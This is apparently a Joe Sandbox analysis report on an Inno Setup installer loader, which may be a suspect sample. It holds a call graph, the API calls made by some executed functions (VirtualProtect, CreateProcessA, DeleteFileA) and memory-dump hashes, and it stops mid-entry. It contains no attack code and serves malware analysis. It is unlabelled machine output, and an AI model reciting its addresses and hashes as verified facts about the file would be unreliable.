6889->6890 6890->6892 6894 405c20 6891->6894 6893 403198 4 API calls 6892->6893 6895 405c86 6893->6895 6896 4059b0 33 API calls 6894->6896 6896->6892 6897 408da4 6898 408dc8 6897->6898 6899 408c80 18 API calls 6898->6899 6900 408dd1 6899->6900 6672 402caa 6673 403154 4 API calls 6672->6673 6674 402caf 6673->6674 6915 4011aa 6916 4011ac GetStdHandle 6915->6916 6675 4028ac 6676 402594 18 API calls 6675->6676 6677 4028b6 6676->6677 4987 40aab4 4988 40aab8 SetLastError 4987->4988 5019 409648 GetLastError 4988->5019 4991 40aad2 4993 40aadc CreateWindowExA SetWindowLongA 4991->4993 5032 405194 4993->5032 4997 40ab6d 4998 4032fc 18 API calls 4997->4998 4999 40ab7a 4998->4999 5049 406b7c GetCommandLineA 4999->5049 5002 4032fc 18 API calls 5003 40ab8f 5002->5003 5054 4099ec 5003->5054 5005 40aba1 5007 40abb4 5005->5007 5075 4098cc 5005->5075 5008 40abd4 5007->5008 5009 40abed 5007->5009 5081 4094d8 5008->5081 5011 40ac06 5009->5011 5013 40ac00 RemoveDirectoryA 5009->5013 5012 40ac0f DestroyWindow 5011->5012 5014 40ac1a 5011->5014 5012->5014 5013->5011 5015 40ac42 5014->5015 5089 40357c 5014->5089 5017 40ac38 5102 4025ac 5017->5102 5106 404c94 5019->5106 5027 4096c3 5121 4031b8 5027->5121 5033 4051a8 33 API calls 5032->5033 5034 4051a3 5033->5034 5035 4032fc 5034->5035 5036 403300 5035->5036 5037 40333f 5035->5037 5038 4031e8 5036->5038 5039 40330a 5036->5039 5037->4997 5045 403254 18 API calls 5038->5045 5046 4031fc 5038->5046 5040 403334 5039->5040 5041 40331d 5039->5041 5043 4034f0 18 API calls 5040->5043 5282 4034f0 5041->5282 5048 403322 5043->5048 5044 403228 5044->4997 5045->5046 5046->5044 5047 4025ac 4 API calls 5046->5047 5047->5044 5048->4997 5308 406af0 5049->5308 5051 406ba1 5052 403198 4 API calls 5051->5052 5053 406bbf 5052->5053 5053->5002 5322 4033b4 5054->5322 5056 409a27 5057 409a59 CreateProcessA 5056->5057 5058 409a65 5057->5058 5059 409a6c CloseHandle 5057->5059 5060 409648 35 API calls 5058->5060 5061 409a75 5059->5061 5060->5059 5062 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5061->5062 5063 409a7a MsgWaitForMultipleObjects 5062->5063 5063->5061 5064 409a91 5063->5064 5065 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5064->5065 5066 409a96 GetExitCodeProcess CloseHandle 5065->5066 5067 409ab6 5066->5067 5068 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5067->5068 5069 409abe 5068->5069 5069->5005 5070 402f24 5071 403154 4 API calls 5070->5071 5072 402f29 5071->5072 5328 402bcc 5072->5328 5074 402f51 5074->5074 5076 4098d4 5075->5076 5080 40990e 5075->5080 5077 403420 18 API calls 5076->5077 5076->5080 5078 409908 5077->5078 5331 408e80 5078->5331 5080->5007 5082 409532 5081->5082 5084 4094eb 5081->5084 5082->5009 5083 4094f3 Sleep 5083->5084 5084->5082 5084->5083 5085 409503 Sleep 5084->5085 5087 40951a GetLastError 5084->5087 5354 408fbc 5084->5354 5085->5084 5087->5082 5088 409524 GetLastError 5087->5088 5088->5082 5088->5084 5090 403591 5089->5090 5091 4035a0 5089->5091 5094 4035d0 5090->5094 5095 40359b 5090->5095 5099 4035b6 5090->5099 5092 4035b1 5091->5092 5093 4035b8 5091->5093 5096 403198 4 API calls 5092->5096 5097 4031b8 4 API calls 5093->5097 5094->5099 5100 40357c 4 API calls 5094->5100 5095->5091 5098 4035ec 5095->5098 5096->5099 5097->5099 5098->5099 5371 403554 5098->5371 5099->5017 5100->5094 5103 4025b0 5102->5103 5104 4025ba 5102->5104 5103->5104 5105 403154 4 API calls 5103->5105 5104->5015 5105->5104 5129 4051a8 5106->5129 5109 407284 FormatMessageA 5110 4072aa 5109->5110 5111 403278 18 API calls 5110->5111 5112 4072c7 5111->5112 5113 408da8 5112->5113 5114 408dc8 5113->5114 5272 408c80 5114->5272 5117 405890 5118 405897 5117->5118 5119 4031e8 18 API calls 5118->5119 5120 4058af 5119->5120 5120->5027 5122 4031be 5121->5122 5123 4031e3 5122->5123 5124 4025ac 4 API calls 5122->5124 5125 403198 5123->5125 5124->5122 5126 4031b7 5125->5126 5127 40319e 5125->5127 5126->4991 5126->5070 5127->5126 5128 4025ac 4 API calls 5127->5128 5128->5126 5130 4051c5 5129->5130 5137 404e58 5130->5137 5133 4051f1 5142 403278 5133->5142 5139 404e73 5137->5139 5138 404e85 5138->5133 5147 404be4 5138->5147 5139->5138 5150 404f7a 5139->5150 5157 404e4c 5139->5157 5143 403254 18 API calls 5142->5143 5144 403288 5143->5144 5145 403198 4 API calls 5144->5145 5146 4032a0 5145->5146 5146->5109 5264 405940 5147->5264 5149 404bf5 5149->5133 5151 404f8b 5150->5151 5156 404fd9 5150->5156 5154 40505f 5151->5154 5151->5156 5153 404ff7 5153->5139 5154->5153 5164 404e38 5154->5164 5156->5153 5160 404df4 5156->5160 5158 403198 4 API calls 5157->5158 5159 404e56 5158->5159 5159->5139 5161 404e02 5160->5161 5167 404bfc 5161->5167 5163 404e30 5163->5156 5194 4039a4 5164->5194 5170 4059b0 5167->5170 5169 404c15 5169->5163 5171 4059be 5170->5171 5180 404cdc LoadStringA 5171->5180 5174 405194 33 API calls 5175 4059f6 5174->5175 5183 4031e8 5175->5183 5178 4031b8 4 API calls 5179 405a1b 5178->5179 5179->5169 5181 403278 18 API calls 5180->5181 5182 404d09 5181->5182 5182->5174 5184 4031ec 5183->5184 5187 4031fc 5183->5187 5184->5187 5189 403254 5184->5189 5185 403228 5185->5178 5187->5185 5188 4025ac 4 API calls 5187->5188 5188->5185 5190 403274 5189->5190 5191 403258 5189->5191 5190->5187 5192 402594 18 API calls 5191->5192 5193 403261 5192->5193 5193->5187 5195 4039ab 5194->5195 5200 4038b4 5195->5200 5197 4039cb 5198 403198 4 API calls 5197->5198 5199 4039d2 5198->5199 5199->5153 5201 4038d5 5200->5201 5202 4038c8 5200->5202 5204 403934 5201->5204 5205 4038db 5201->5205 5228 403780 5202->5228 5206 403993 5204->5206 5207 40393b 5204->5207 5208 4038e1 5205->5208 5209 4038ee 5205->5209 5212 4037f4 3 API calls 5206->5212 5213 403941 5207->5213 5214 40394b 5207->5214 5235 403894 5208->5235 5211 403894 6 API calls 5209->5211 5217 4038fc 5211->5217 5215 4038d0 5212->5215 5250 403864 5213->5250 5216 4037f4 3 API calls 5214->5216 5215->5197 5219 40395d 5216->5219 5240 4037f4 5217->5240 5221 403864 23 API calls 5219->5221 5223 403976 5221->5223 5222 403917 5246 40374c 5222->5246 5225 40374c VariantClear 5223->5225 5227 40398b 5225->5227 5226 40392c 5226->5197 5227->5197 5229 4037f0 5228->5229 5231 403744 5228->5231 5229->5215 5230 403793 VariantClear 5230->5231 5231->5228 5231->5230 5232 403198 4 API calls 5231->5232 5233 4037ab 5231->5233 5234 4037dc VariantCopyInd 5231->5234 5232->5231 5233->5215 5234->5229 5234->5231 5255 4036b8 5235->5255 5238 40374c VariantClear 5239 4038a9 5238->5239 5239->5215 5241 403845 VariantChangeTypeEx 5240->5241 5242 40380a VariantChangeTypeEx 5240->5242 5243 403832 5241->5243 5244 403826 5242->5244 5243->5222 5245 40374c VariantClear 5244->5245 5245->5243 5247 403766 5246->5247 5248 403759 5246->5248 5247->5226 5248->5247 5249 403779 VariantClear 5248->5249 5249->5226 5261 40369c SysStringLen 5250->5261 5253 40374c VariantClear 5254 403882 5253->5254 5254->5215 5256 4036cb 5255->5256 5257 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5256->5257 5258 4036db 5256->5258 5259 40372e 5257->5259 5260 4036ed MultiByteToWideChar SysAllocStringLen 5258->5260 5259->5238 5260->5259 5262 403610 21 API calls 5261->5262 5263 4036b3 5262->5263 5263->5253 5265 40594c 5264->5265 5266 404cdc 19 API calls 5265->5266 5267 405972 5266->5267 5268 4031e8 18 API calls 5267->5268 5269 40597d 5268->5269 5270 403198 4 API calls 5269->5270 5271 405992 5270->5271 5271->5149 5273 403198 4 API calls 5272->5273 5275 408cb1 5272->5275 5273->5275 5274 4031b8 4 API calls 5276 408d69 5274->5276 5277 408cc8 5275->5277 5278 403278 18 API calls 5275->5278 5280 408cdc 5275->5280 5281 4032fc 18 API calls 5275->5281 5276->5117 5279 4032fc 18 API calls 5277->5279 5278->5275 5279->5280 5280->5274 5281->5275 5283 4034fd 5282->5283 5290 40352d 5282->5290 5284 403526 5283->5284 5286 403509 5283->5286 5287 403254 18 API calls 5284->5287 5285 403198 4 API calls 5288 403517 5285->5288 5291 4025c4 5286->5291 5287->5290 5288->5048 5290->5285 5292 4025ca 5291->5292 5293 4025dc 5292->5293 5295 403154 5292->5295 5293->5288 5293->5293 5296 403164 5295->5296 5297 40318c TlsGetValue 5295->5297 5296->5293 5298 403196 5297->5298 5299 40316f 5297->5299 5298->5293 5303 40310c 5299->5303 5301 403174 TlsGetValue 5302 403184 5301->5302 5302->5293 5304 403120 LocalAlloc 5303->5304 5305 403116 5303->5305 5306 403132 5304->5306 5307 40313e TlsSetValue 5304->5307 5305->5304 5306->5301 5307->5306 5309 406b1c 5308->5309 5310 403278 18 API calls 5309->5310 5311 406b29 5310->5311 5318 403420 5311->5318 5313 406b31 5314 4031e8 18 API calls 5313->5314 5315 406b49 5314->5315 5316 403198 4 API calls 5315->5316 5317 406b6b 5316->5317 5317->5051 5319 403437 5318->5319 5320 403426 5318->5320 5319->5313 5320->5319 5321 403254 18 API calls 5320->5321 5321->5319 5323 4033bc 5322->5323 5324 403254 18 API calls 5323->5324 5325 4033cf 5324->5325 5326 4031e8 18 API calls 5325->5326 5327 4033f7 5326->5327 5329 402bd5 RaiseException 5328->5329 5330 402be6 5328->5330 5329->5330 5330->5074 5332 408e8e 5331->5332 5334 408ea6 5332->5334 5344 408e18 5332->5344 5335 408e18 18 API calls 5334->5335 5336 408eca 5334->5336 5335->5336 5347 407918 5336->5347 5338 408ee5 5339 408e18 18 API calls 5338->5339 5341 408ef8 5338->5341 5339->5341 5340 408e18 18 API calls 5340->5341 5341->5340 5342 403278 18 API calls 5341->5342 5343 408f27 5341->5343 5342->5341 5343->5080 5345 405890 18 API calls 5344->5345 5346 408e29 5345->5346 5346->5334 5350 4078c4 5347->5350 5351 4078d6 5350->5351 5352 4078e7 5350->5352 5353 4078db InterlockedExchange 5351->5353 5352->5338 5353->5352 5362 408f70 5354->5362 5356 408fd2 5357 408fd6 5356->5357 5358 408ff2 DeleteFileA GetLastError 5356->5358 5357->5084 5359 409010 5358->5359 5368 408fac 5359->5368 5363 408f7a 5362->5363 5364 408f7e 5362->5364 5363->5356 5365 408fa0 SetLastError 5364->5365 5366 408f87 Wow64DisableWow64FsRedirection 5364->5366 5367 408f9b 5365->5367 5366->5367 5367->5356 5369 408fb1 Wow64RevertWow64FsRedirection 5368->5369 5370 408fbb 5368->5370 5369->5370 5370->5084 5372 403566 5371->5372 5374 403578 5372->5374 5375 403604 5372->5375 5374->5098 5376 40357c 5375->5376 5379 4035d0 5376->5379 5380 40359b 5376->5380 5383 4035a0 5376->5383 5385 4035b6 5376->5385 5377 4035b1 5381 403198 4 API calls 5377->5381 5378 4035b8 5382 4031b8 4 API calls 5378->5382 5379->5385 5386 40357c 4 API calls 5379->5386 5380->5383 5384 4035ec 5380->5384 5381->5385 5382->5385 5383->5377 5383->5378 5384->5385 5387 403554 4 API calls 5384->5387 5385->5372 5386->5379 5387->5384 6678 401ab9 6679 401a96 6678->6679 6680 401aa9 RtlDeleteCriticalSection 6679->6680 6681 401a9f RtlLeaveCriticalSection 6679->6681 6681->6680

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00409B78 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 130 409bc7-409bca 126->130 129 409bf2-409bf5 127->129 128->127 131 409be5-409bee call 409b70 129->131 132 409bf7-409bf9 129->132 130->124 130->127 131->129 132->121 134 409bfb-409c08 VirtualProtect 132->134 134->121
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2441996862-0
                                                                                                                                                                                                                                  • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                                                                                                                                                  • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040520C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                  • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                                                                                                                                                  • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                                                                                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 3256987805-3653653586
                                                                                                                                                                                                                                  • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                                                                                  • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040AAB4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                                                                                                                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02100420), ref: 0040966C
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(000104B0,000000FC,00409960), ref: 0040AB15
                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                                                                                                                                  • DestroyWindow.USER32(000104B0,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                                                                                                                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                                                                                  • API String ID: 3757039580-3001827809
                                                                                                                                                                                                                                  • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                                                                                                                                                  • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-2130885113
                                                                                                                                                                                                                                  • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                                                                                                                                                  • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040AAA2 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(000104B0,000000FC,00409960), ref: 0040AB15
                                                                                                                                                                                                                                    • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                                                                                                                                                    • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                                                                                                                    • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8,00000000), ref: 00409A70
                                                                                                                                                                                                                                    • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                                                                                                                    • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                                                                                                                    • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8), ref: 00409AA4
                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                                                                                                                                  • DestroyWindow.USER32(000104B0,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                                                                                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                                                                                  • API String ID: 3586484885-3001827809
                                                                                                                                                                                                                                  • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                                                                                                                                  • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004099EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
